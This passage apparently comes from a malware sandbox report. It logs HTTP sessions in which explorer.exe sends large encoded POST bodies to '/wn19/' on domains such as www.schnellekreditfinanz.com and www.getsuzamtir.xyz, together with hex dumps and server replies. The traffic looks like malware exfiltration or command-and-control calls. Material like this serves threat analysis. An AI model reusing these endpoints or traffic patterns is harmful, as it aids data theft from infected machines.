3RMTi9I~bL33lKLCcMdB7x1R1IhBA8U6vx_Hcavk7mKB-CNwTBNOc0UP5if(7H_XAwzVbUItYx6A1VS8eDwCS2feG9HRjekC4Q2IAN4gBn2N_LFnAQqItqhGu5KkXEz1VBvXeEle1(hmYaXQn5riUBgFXX5p_Hl8ekQdJV4hy(ySi1Er-~rMsGAGlMFx5yMp9S8baYIuXSw67YPiM1YEO72Vb~tSLsxg4lyzMseytp2(cj7WY4kHzvJXJKFzmuNBZiJbnUrKBGv358GmfimOCR5rigFJ1ca89YxntbazUHiIgEld5hCJqMfquu1VaNO(4BTXFrtusBIpPw84Yclk3mW6kpZShtaJT9UfmE72PytOrh3SYz7ERPSS2amgNZlwZfjhhM_CfhGTdJwHcQrrJ5TtajwjLTNHw2VaRhITp0_hW6e3psWzRNda0GEijRKEojjIDtzBffFYIj-OpuvBd19mvzK500qwc8e3YrsFmYdkKuQTbMrxkjbRyqY8oU5AcsPaFfi77bK1JPPX2wikr(zIUtOfRWqI7LOoP6WqZeCZje4LfCit6mDFNr05xZeAaLwTECrd_WaDrVmIBFCkhTjbTla1qt4imtfXCfUKpzMMTORFci0O-0blfAgkeptnDJK8Nkt64nGOiBBPSFlzw4raG4EOVVZN79hh4YDCceQCBnDcjoWSO(Z6n8r5LkNke0YNix0a74YaJunBD3HFjE4Shuac7Ihs_J4diV-FxWZ9Mk7Y-r5tjh6yaJY4R55qG6dvW5Lbvl-bZpEbuFjC5hwQhw3mXrvySXxCvYw0sLfAwkeup1Dy_tgu2dcr2b1MkNh~Jz8cCHOl7BqKWDw0RYlA_mZpQcoF99hYl7Qi1fugBtahfbuq1WMwk(5TmUIM0yuNGw0XDYnMeEipfbwafLK87uA4UO7HjbKSwiIDkHXchYxwYpeffWYgZYmizjprKLIZ9hf(DxeeXk3qt7pVy2fssDakty6ftj9UCcIPpj3Lsfi0HeHvB4Om6NYTU8fcYGA0umBcbDp3ykPPQxvqCFvmVAxPAwbKMpHnXUAWEERrOw4g9nMPeEb~3sOwZM3j5mQRMCGTxfGik0zVY6CEY7b48imL4NlbhoMD5kLNU9uN995vRq_IK~G9U7qToJQcAoiOUNWT1InfKPAxRP4yPrylDzgRAqB0lIQkWxF8M7YyMWoqnEifZLyrrL36akyW5lLRfWTrxlNSEcZXNO5Na2OHd2EgMZ_aGjvCNX9FBBpsvkUITY92fH-eqMNGa1eOc~UB517zOXenP8bDttqH1N6uZcsyZVX3sSEpyjdfOaSXHpa2VKYY8fh3i0KVxIc2vxL5nrU0oD88onUTU6-tahkXc7wDS~KsXvwA6XfiA6FE9es8pVLZEF3hrUsQRx7TuxXoQq7853FendpQV7nvDK7i-uhhpbXrbpZR9Ush0SHecCNUoHHOepgmLWfTvzLu-9cOwT37_hFxey_bTM_Sll0xxQ09emwAa0RVoe30hayOAVRkDD5qEWwZCQoGlOUZ_m2P5k4G52Zp3KMGA5x6C1HDE(XTuQJ4OZ7N41w7W8Thw7WuwWlFfRAM5gkvO6oNTffEh(i3Z5EWlZvqBjzXzDEjqNybSGPxNWBlMFMmxyI4nj2fW11ucZTkwwUTEmsYrhF~N3ytPp4RqRcjbY2ubs4l4GuLSqfIU8p0vIv38zl4y4AqnMCq8ijiIvkzac3OCDxVIAh8ztR4eM6S2ejfNH6xBdNCUqIgWcG5Savq4r2nfDtICMRBoNFBzvozo~P6B2fSzSQQiEZxMB_NFyfnKeCpTenPqwpbb(AqA7k00Dk6oDn4kU_UlDLBgJfipFwNk8UhGBAnmW2BGOUtyxdjB522Uf_tXjbxx05iDv1L85S6I~6UkVPqP6-mdtWSnSri_1zdfkfExKlaKAhRs5VAmVanGhDnIU3~hmcapjYexdUl35TH6tp0wczIR5z0S7rLxTYPlloaVrNNLl4USUcl1UnLuMxQdc7uVntTo0khM5ABSX5jvWRwDl0hstNCxNJCupOeV0dvxfna7LYcCGjKRr-va8W9pJYbC(JwQDR5I8trQVVWXieKMfB1I3neTCuwRQmunX9nkojt5BaniusQTDlG2rPRQfcChlY1sjQVSjBC06I(vSYpLc_tgnGMz1d2RoReq6RjmH6uZy6H0YElg2En8gz64iqw-W5QRcQPkgws6sJ77(GhmOCwf8QMzQlBdi4YfqbT8xhp4f_27Jzt564LKnOjy4NBoSEAouLDvWqKB4yLEqt9ne-s-pSC7Y_5jOAZ068Vk2jg58olp6sfOyCeZp_4Y(5chiVKZVhaDkDtyO0xKGymXGFY92KNTiX3blaODF3pMVHsWApjipI4ycTzBH9CVexF0JG6OrcufrXsnKYTJ431QvdxxAxvBtqbfOa3cblYdBhspPuhiS0lP5RvBMoF4a1PtbWSWIMcHRGqg79BB(F86W54odyYXoS6v49pmo22O4aW_lWbahXF4BVrVnRHLygMwu2hTvTBeOSn3CtNtvdZnxUc1xtWy8hw60qkTa2eoCnVZA_oeBTxtksVHCYQ_i8VKZzEqmglVQ8xw3SpQflwNadaPol~s4j7vsg2FXrSTJ9p9sw02~Kryd1SaAZc-(7Q3Kyo6ZBM8Wt(
May 10, 2022 14:26:47.464056015 CEST	9862	OUT	Data Raw: 36 46 31 54 6f 32 2d 43 62 53 69 45 6e 28 67 75 79 72 43 6c 48 55 68 59 4d 37 57 77 53 33 30 44 6c 70 61 6a 33 34 46 45 52 63 65 28 6b 68 69 58 70 7a 30 47 4b 57 4e 4c 61 4a 4d 66 5a 67 63 72 59 6c 55 30 63 41 55 6c 41 33 35 71 50 69 62 45 56 68 Data Ascii: 6F1To2-CbSiEn(guyrClHUhYM7WwS30Dlpaj34FERce(khiXpz0GKWNLaJMfZgcrYlU0cAUlA35qPibEVh4XmWLSUgSrFw7aIF7tuZqIw24~8dT9cw0ufcPLulMYmoorMPSf_FqwLLs518_FtDSkMCaVlBB8dlzgcIa(nPdgJw3smczhPk6ypXzdI2RKAu7kjrWC951Xjdxh5zQDEANUjHlA6BGij3OigAOCJ6FnF81MObhadsV
May 10, 2022 14:26:47.464184046 CEST	9875	OUT	Data Raw: 45 45 6a 43 39 69 70 33 4e 76 30 39 79 47 52 32 33 74 35 32 6c 35 67 77 39 62 67 78 4c 62 30 45 71 55 65 50 41 48 4b 6e 74 45 6c 28 48 6a 75 64 67 55 30 48 6b 42 50 34 4d 32 45 34 4b 43 52 51 35 58 5f 28 66 74 38 68 47 4a 51 34 48 65 46 4b 4f 62 Data Ascii: EEjC9ip3Nv09yGR23t52l5gw9bgxLb0EqUePAHKntEl(HjudgU0HkBP4M2E4KCRQ5X_(ft8hGJQ4HeFKObarF7vvgHq6AP0ZHn_QK6xrQb48918BLmZOU9guo6DgoE6m5tBMkKy9m947IJ5a0rDrIq7Ri6kPNf46kf6thx-g69RK9esDuFmde~JcSKWnYQO324UY2sCSvXh5FqcwZQSE6tDbljKV3yLVEPvTpj8lu2zz-sYB5w8
May 10, 2022 14:26:47.464391947 CEST	9876	OUT	Data Raw: 59 44 67 36 42 67 69 69 4b 79 30 71 6c 38 4a 64 5f 33 63 76 58 62 54 39 79 56 74 58 43 7a 58 62 72 55 46 7e 74 62 68 5a 38 30 65 37 5a 59 32 71 48 70 69 34 6f 58 67 73 42 52 79 33 47 6e 6d 4b 74 38 56 28 6d 31 56 53 44 42 39 65 53 5a 51 42 6c 48 Data Ascii: YDg6BgiiKy0ql8Jd_3cvXbT9yVtXCzXbrUF~tbhZ80e7ZY2qHpi4oXgsBRy3GnmKt8V(m1VSDB9eSZQBlHY8fMOmzwyObjuTJTgtW4dk2TSiB6lqFGOeGPgCDL6VAkXLKZanp2Uce9Fi2or2NdKIuKa6L8Gla4MgBT-h5tP37s8NijzCmeJ8VuluzH-HSr6LHtQfim2ojUYLyYZvoU_YSqfXO(XNRkutjEhh2Yxd0OX20p1gdm0
May 10, 2022 14:26:47.464581966 CEST	9885	OUT	Data Raw: 72 30 56 7a 61 4d 37 62 78 42 34 66 30 77 67 59 48 28 4a 41 42 63 43 35 70 70 71 48 6f 62 5a 54 46 4b 69 74 57 39 77 64 61 58 48 69 7a 36 68 30 6c 4c 44 6c 49 49 6d 47 30 62 6b 64 33 57 42 44 36 78 71 53 63 42 66 46 56 61 55 6a 59 52 30 70 4d 53 Data Ascii: r0VzaM7bxB4f0wgYH(JABcC5ppqHobZTFKitW9wdaXHiz6h0lLDlIImG0bkd3WBD6xqScBfFVaUjYR0pMSsuctxznAEXnmXKad5eXoHSRM8J1wMTqksa0iaQ87NfF9Ug3V6himZD1hw4AkjrKoyfFjLiyuclPvZb-PmPe5vFjKPpaVUl6AJwk3sbXjdge2T8pg3EjxsN-bIGsOyt-cng3MSMxXqZgISMl9Gv8(VSB(77tdT4cIW
May 10, 2022 14:26:47.628319025 CEST	9891	OUT	Data Raw: 6c 70 55 42 37 70 43 79 76 48 6c 42 6d 67 53 54 34 48 76 6e 4d 56 4d 50 5f 56 4c 57 71 65 6b 42 75 75 71 4c 78 53 6f 68 76 69 53 56 59 6a 33 35 46 59 45 44 5a 54 36 36 76 62 41 66 4b 58 4d 63 37 44 64 4d 67 4e 39 58 75 47 4b 54 6b 64 64 57 31 30 Data Ascii: lpUB7pCyvHlBmgST4HvnMVMP_VLWqekBuuqLxSohviSVYj35FYEDZT66vbAfKXMc7DdMgN9XuGKTkddW106DOKpOtl8Bhw398gl3KdQq1vF1H0gASd2BVKhdrZO6y0TnmbD239K5DqXo9(WIHnXGbrEp8V2fM476zZQl46Usu0AJiK1v3X9SISxmRZat87vL1nGP14VxQ8cFYsFFRFbF2tzb-D4Drj2~LcIlgSdVzcmovdI1rIn
May 10, 2022 14:26:47.628434896 CEST	9896	OUT	Data Raw: 45 32 6c 68 6f 51 77 5a 6f 72 5a 52 79 62 4c 78 73 64 6b 54 30 54 35 75 41 42 31 61 53 37 32 36 42 78 2d 72 6f 51 43 50 6b 47 75 4a 6b 63 6d 67 56 6c 52 6a 76 5a 5f 6d 76 7a 6d 4f 59 6c 74 56 34 48 47 61 42 61 67 7a 30 4a 45 56 6a 49 75 55 67 72 Data Ascii: E2lhoQwZorZRybLxsdkT0T5uAB1aS726Bx-roQCPkGuJkcmgVlRjvZ_mvzmOYltV4HGaBagz0JEVjIuUgr8hBTO8PAT0GArT4J8LuSJUbqE3KcDtD(I1B4wqikufgTBfKq64OqMmtA8kz~GE4txDze-qGNomBMmt7H6r9AEJou4fUvBb4G3ok5AfYLC7peN8WFiWpFZMUBax12kBJH5DnFFYY2aKaYoWwtPvr7tpHTexHv5nezR
May 10, 2022 14:26:47.628797054 CEST	9898	OUT	Data Raw: 46 79 63 74 48 76 68 47 79 59 45 6c 37 4c 66 7e 4c 69 62 33 6a 52 57 41 69 65 6f 50 6e 36 75 35 4d 43 52 30 37 32 48 78 62 7a 72 56 49 63 63 67 4b 54 4f 30 55 37 70 63 43 33 55 4a 59 4c 69 35 78 46 34 64 4e 36 6d 47 4a 42 5f 64 63 42 36 38 5f 4a Data Ascii: FyctHvhGyYEl7Lf~Lib3jRWAieoPn6u5MCR072HxbzrVIccgKTO0U7pcC3UJYLi5xF4dN6mGJB_dcB68_JW8rlFzL3lAk1hkwsW28BnRJUAEexsxWDaZEGx6ijwucOgtCjnvMrNv7YUpLH4bKVvFPFGrP4SNgMgxwkT6yKN(WOpi8DqNQIttkE2vHzFrREIO2(DAiuyfyAVZVCR6-tLV04HlrkSQvNpQweuFZV9xOQcGmxxaUDl
May 10, 2022 14:26:47.628978014 CEST	9907	OUT	Data Raw: 73 34 35 33 46 69 75 58 5f 78 53 50 6f 58 39 71 54 74 43 6f 38 6c 37 37 54 51 33 54 7a 75 6a 49 62 79 74 4a 47 52 70 58 65 5a 55 71 52 44 48 44 54 6f 68 53 55 6f 37 55 36 53 59 4a 61 79 58 63 53 4d 37 51 31 43 4d 48 7a 45 66 37 51 44 49 42 2d 69 Data Ascii: s453FiuX_xSPoX9qTtCo8l77TQ3TzujIbytJGRpXeZUqRDHDTohSUo7U6SYJayXcSM7Q1CMHzEf7QDIB-iHBkJhbTmJwnAXt-u8Q6v6VwUX9PSNDoVdpLda5yupgoIqJvpWGpB0H6eswV1UErB-1ljO1_f3WDabKMln7JDKE72HZ8MpiEq2PkMes9yGhdkWWzkNh4kjGAVRjEZWGPv6e1JqGqAJkKsoiWS10lRL(OqKyOMDA9nY
May 10, 2022 14:26:47.629221916 CEST	9908	OUT	Data Raw: 49 69 73 28 5f 54 6d 54 68 43 75 4a 77 76 56 59 6a 68 38 6f 37 66 59 34 35 64 47 5a 63 54 6c 4e 79 72 62 68 56 63 35 67 4e 79 52 37 70 53 4f 7e 67 35 48 51 52 50 34 52 43 6a 46 62 55 6d 4f 33 31 67 2d 72 78 63 58 70 78 33 4d 79 4d 67 4b 66 51 58 Data Ascii: Iis(_TmThCuJwvVYjh8o7fY45dGZcTlNyrbhVc5gNyR7pSO~g5HQRP4RCjFbUmO31g-rxcXpx3MyMgKfQXDHW8UvK~eHikNnZIGTtsQqKIESTHbkxrvohrNjG5H99gS4hkITuOL1iyeFCuSM21HyrCGYZHQ2oqSN_deoaJV8kRT0sDCCdNmwYHKYD1YehpUfK4x6IFtYg~Ytf7EpCPsf9U4eMcAggPnZl6FMQzESxg7gBwKtWVR
May 10, 2022 14:26:47.629395962 CEST	9912	OUT	Data Raw: 64 42 42 56 4b 31 6f 5a 54 4f 45 6f 59 61 65 76 62 39 79 73 73 59 39 6c 68 31 47 36 38 28 33 44 77 38 75 46 41 59 42 41 67 47 33 53 30 57 39 4f 44 31 41 61 66 76 33 42 5a 42 69 4e 52 41 31 57 45 5a 74 32 5f 47 50 65 7a 6c 6b 69 65 4d 62 64 64 74 Data Ascii: dBBVK1oZTOEoYaevb9yssY9lh1G68(3Dw8uFAYBAgG3S0W9OD1Aafv3BZBiNRA1WEZt2_GPezlkieMbddthcatX~YP5tbl1JYMNm_IWzWb8K1PeE4aFrXsWyaeORQGlVqkvuJwyFBs-Yv2zb4N3LKD-ch1YpFoWBWWgKf(Q6VDkgqzrWNrieK8TL4IlAkQn(56Bu6Lxdar1mGAEfAeFeyabuu~3h3Jp(TTHSOo3DvPokh8UVOWd
May 10, 2022 14:26:48.269566059 CEST	10076	IN	HTTP/1.1 404 Not Found Date: Tue, 10 May 2022 12:26:47 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49773	68.65.122.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:27:06.293628931 CEST	10077	OUT	GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1 Host: www.schnellekreditfinanz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 10, 2022 14:27:06.458909035 CEST	10078	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Tue, 10 May 2022 12:27:06 GMT server: LiteSpeed location: https://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49774	68.65.122.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:27:08.635654926 CEST	10085	OUT	POST /wn19/ HTTP/1.1 Host: www.schnellekreditfinanz.com Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.schnellekreditfinanz.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.schnellekreditfinanz.com/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 64 74 49 75 6d 67 64 39 35 30 28 34 49 42 59 71 38 31 4e 6c 65 6c 47 58 36 51 64 77 69 45 54 59 6a 31 4d 41 66 36 48 61 6a 71 30 6e 70 4d 35 37 54 4b 72 4b 52 75 44 56 6f 79 55 72 52 46 58 37 58 58 35 43 6f 4e 7a 44 6c 53 70 47 50 6b 53 63 51 30 63 37 31 36 47 72 4c 55 44 35 4c 33 48 47 65 78 50 44 53 43 4d 66 67 43 6d 31 34 72 69 78 66 38 65 37 61 4d 31 32 35 32 28 72 36 50 33 62 66 71 38 67 57 2d 77 4c 73 63 72 4e 4b 48 6f 59 76 4d 55 4a 7a 35 51 34 6c 48 6b 68 74 31 34 67 65 36 59 54 64 6d 34 67 6c 74 79 49 65 4a 28 75 63 5a 71 44 6e 63 62 76 36 6c 41 6e 71 4d 45 76 6a 67 28 62 72 57 39 68 4b 41 39 70 68 7a 6a 76 6b 48 4b 59 77 75 35 34 7a 59 48 6e 66 66 4b 79 54 58 33 39 7e 4d 51 2d 55 74 73 49 6a 64 43 62 39 4f 33 67 50 38 33 4e 35 53 65 44 53 77 72 68 71 30 57 57 79 4a 46 34 74 50 33 6e 74 6a 7e 50 7e 4f 4c 6f 6c 41 36 79 46 79 4d 55 61 70 56 78 6a 6a 6b 68 50 69 65 71 65 7a 50 37 63 65 6c 79 5a 55 7a 6a 71 2d 51 51 70 45 57 72 62 5f 70 6a 4a 56 62 70 36 2d 67 4c 55 5a 49 7a 54 47 4a 66 52 65 31 54 64 43 73 57 4b 77 79 42 54 4b 50 39 74 6c 4a 70 30 64 74 58 7a 6a 78 68 57 79 77 6f 57 34 28 38 30 35 37 4a 49 56 70 6c 46 47 4d 52 4f 64 66 79 62 54 42 39 6d 32 72 38 48 43 32 69 68 6c 54 38 41 55 42 31 4a 36 52 6f 4a 39 77 58 39 53 50 38 50 69 4a 73 75 53 6a 57 6d 5a 67 46 76 48 79 4d 65 45 73 43 63 59 77 56 67 56 53 6e 6e 72 37 32 6b 33 71 72 41 59 5a 70 76 78 6d 79 53 67 6a 54 63 61 59 46 41 6b 69 46 41 69 62 38 72 62 6b 51 45 7a 79 36 64 70 78 79 41 4c 36 61 6a 65 46 75 5a 35 55 36 52 45 37 59 64 61 61 73 58 44 6b 32 46 63 7a 35 53 4e 67 6b 54 69 53 47 46 4e 45 6c 41 79 41 4f 53 45 48 64 45 50 37 7a 44 46 33 7a 71 53 55 57 4f 6c 4d 4b 38 51 57 66 53 36 51 54 64 72 44 69 78 71 73 38 52 47 52 4e 33 6a 68 52 4b 4c 41 5a 6a 2d 41 4c 36 52 53 53 6b 56 68 48 36 44 53 6e 58 66 59 61 4e 56 53 73 65 76 66 58 32 35 6a 72 47 72 37 67 74 49 57 41 45 53 55 6c 6a 79 30 6e 71 76 72 35 45 62 59 44 38 54 49 75 52 65 6e 53 44 6b 56 35 36 35 33 61 44 6d 39 61 53 31 4c 47 7a 76 4a 7a 33 66 35 4f 6a 6b 78 78 4b 35 31 59 28 35 48 6d 58 43 68 63 4e 57 39 78 53 51 4f 79 42 48 48 4b 45 4e 6b 63 6a 41 75 49 67 52 44 54 55 59 67 4a 6e 39 43 44 30 37 4e 4c 78 32 75 45 35 44 50 4d 53 66 75 6c 74 56 78 57 64 51 78 54 31 53 39 57 6c 77 7a 4e 42 63 34 79 62 4b 30 7a 59 4d 28 4f 4b 53 74 50 49 58 50 77 5a 4a 43 53 5a 36 32 4f 67 6f 59 52 37 2d 56 4b 67 41 43 50 75 43 4c 47 69 38 79 71 79 55 4b 4b 30 63 73 42 76 45 39 5a 34 63 48 5a 6a 4d 43 72 63 75 69 47 6e 62 7e 6f 75 74 75 6b 55 4e 30 31 65 4f 4c 6f 36 72 76 42 73 4d 34 51 54 78 42 49 53 52 7e 4c 6d 46 4c 46 77 78 78 54 45 47 34 71 62 42 61 72 52 45 4a 69 76 6f 7a 52 34 78 58 45 47 7a 43 45 56 50 74 45 41 49 63 46 74 62 33 48 56 7a 33 54 6c 48 65 62 6e 42 46 6c 6c 4c 71 39 50 45 44 63 33 5f 75 68 33 6d 64 4d 62 45 45 61 54 4c 48 47 4d 72 73 63 55 52 48 57 30 6f 48 35 42 62 33 44 62 74 48 30 72 73 50 49 4d 57 47 61 41 47 68 4c 31 36 46 6a 37 59 72 58 4f 6c 71 49 58 59 67 44 4f 69 4b 48 70 56 51 55 64 35 76 75 7e 53 66 6c 36 4b 63 4a 6a 50 5a 47 46 78 6a 63 67 44 49 4d 4f 57 47 66 30 32 76 54 45 6b 57 63 68 65 55 36 35 56 6b 42 49 49 4f 51 53 5f 4a 72 48 6b 74 73 6a 4e 42 58 4d 35 35 57 6f 4b 53 4a 32 4f 6b 79 37 51 35 74 37 66 4f 49 36 68 4e 72 4b 72 4e 49 4b 53 38 34 45 41 7a 65 72 47 37 52 6f 6b 68 6e 52 58 71 4f 67 72 65 69 77 4e 77 48 4e 33 6c 36 72 59 69 57 6b 73 53 54 63 30 64 5f 6d 69 4d 43 77 50 44 53 6f 56 53 6b 55 4f 6c 4a 28 6d 6d 30 77 76 74 58 56 65 32 7a 77 70 56 6c 7e 6f 6d 50 47 43 69 45 58 42 34 4e 37 59 33 4e 32 34 4c 52 4a 54 32 71 6d 7a 43 37 37 4c 7e 5f 51 67 36 63 32 47 7e 41 6e 62 59 33 65 4d 41 4f 71 6d 4b 30 69 36 78 63 4c 69 54 38 49 6a 33 46 53 36 63 56 6e 76 6b 75 38 5a 78 4a 69 4f 28 39 73 45 75 4b 76 57 76 69 70 46 4d 51 31 35 32 62 33 51 79 43 43 4b 71 32 49 75 37 75 33 37 39 6f 50 4e 37 6c 66 47 68 4f 6e 76 6d 30 45 4e 4e 6c 44 4b 48 6b 48 43 6c 50 58 53 6a 2d 6e 59 6f 46 45 6a 6b 59 57 58 43 6e 44 67 77 56 42 56 53 6b 6f 43 65 53 31 76 52 4c 35 30 65 47 37 38 5a 6d 53 2d 43 56 68 52 59 41 42 64 39 4f 55 65 4a 62 73 6b 45 67 49 73 5a 30 Data Ascii: AVnXAh=dtIumgd950(4IBYq81NlelGX6QdwiETYj1MAf6Hajq0npM57TKrKRuDVoyUrRFX7XX5CoNzDlSpGPkScQ0c716GrLUD5L3HGexPDSCMfgCm14rixf8e7aM1252(r6P3bfq8gW-wLscrNKHoYvMUJz5Q4lHkht14ge6YTdm4gltyIeJ(ucZqDncbv6lAnqMEvjg(brW9hKA9phzjvkHKYwu54zYHnffKyTX39~MQ-UtsIjdCb9O3gP83N5SeDSwrhq0WWyJF4tP3ntj~P~OLolA6yFyMUapVxjjkhPieqezP7celyZUzjq-QQpEWrb_pjJVbp6-gLUZIzTGJfRe1TdCsWKwyBTKP9tlJp0dtXzjxhWywoW4(8057JIVplFGMROdfybTB9m2r8HC2ihlT8AUB1J6RoJ9wX9SP8PiJsuSjWmZgFvHyMeEsCcYwVgVSnnr72k3qrAYZpvxmySgjTcaYFAkiFAib8rbkQEzy6dpxyAL6ajeFuZ5U6RE7YdaasXDk2Fcz5SNgkTiSGFNElAyAOSEHdEP7zDF3zqSUWOlMK8QWfS6QTdrDixqs8RGRN3jhRKLAZj-AL6RSSkVhH6DSnXfYaNVSsevfX25jrGr7gtIWAESUljy0nqvr5EbYD8TIuRenSDkV5653aDm9aS1LGzvJz3f5OjkxxK51Y(5HmXChcNW9xSQOyBHHKENkcjAuIgRDTUYgJn9CD07NLx2uE5DPMSfultVxWdQxT1S9WlwzNBc4ybK0zYM(OKStPIXPwZJCSZ62OgoYR7-VKgACPuCLGi8yqyUKK0csBvE9Z4cHZjMCrcuiGnb~outukUN01eOLo6rvBsM4QTxBISR~LmFLFwxxTEG4qbBarREJivozR4xXEGzCEVPtEAIcFtb3HVz3TlHebnBFllLq9PEDc3_uh3mdMbEEaTLHGMrscURHW0oH5Bb3DbtH0rsPIMWGaAGhL16Fj7YrXOlqIXYgDOiKHpVQUd5vu~Sfl6KcJjPZGFxjcgDIMOWGf02vTEkWcheU65VkBIIOQS_JrHktsjNBXM55WoKSJ2Oky7Q5t7fOI6hNrKrNIKS84EAzerG7RokhnRXqOgreiwNwHN3l6rYiWksSTc0d_miMCwPDSoVSkUOlJ(mm0wvtXVe2zwpVl~omPGCiEXB4N7Y3N24LRJT2qmzC77L~_Qg6c2G~